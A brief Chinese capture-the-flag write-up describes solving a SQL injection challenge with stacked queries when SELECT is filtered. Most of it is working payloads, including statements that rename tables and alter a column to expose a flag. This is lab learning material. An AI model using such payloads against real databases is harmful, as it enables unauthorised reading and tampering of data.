题目是注入,于是尝试SQL注入
order by 2得到两个字段
尝试联合查询时发现禁用了select
百度了解到堆叠查询
用;将语句隔开
发现可以使用堆叠注入
继续查询表名
查询表中的字段名
0';show columns from words;-- qwe
查询1919810931114514表的时候出现了问题
百度了解到数字表名需要用反引号``括起来
0';show columns from `1919810931114514`;-- asd
可以看到flag就在1919810931114514表中
但是select被禁用,不会了
百度得到改名的解法
0';
rename table `words` to `test`;
rename table `1919810931114514` to `words`;
alter table `words` change `flag` `id` varchar(100);
show columns from words;-- qwe
此时使用一开始的1'or 1=1 -- qwe
即可得到数据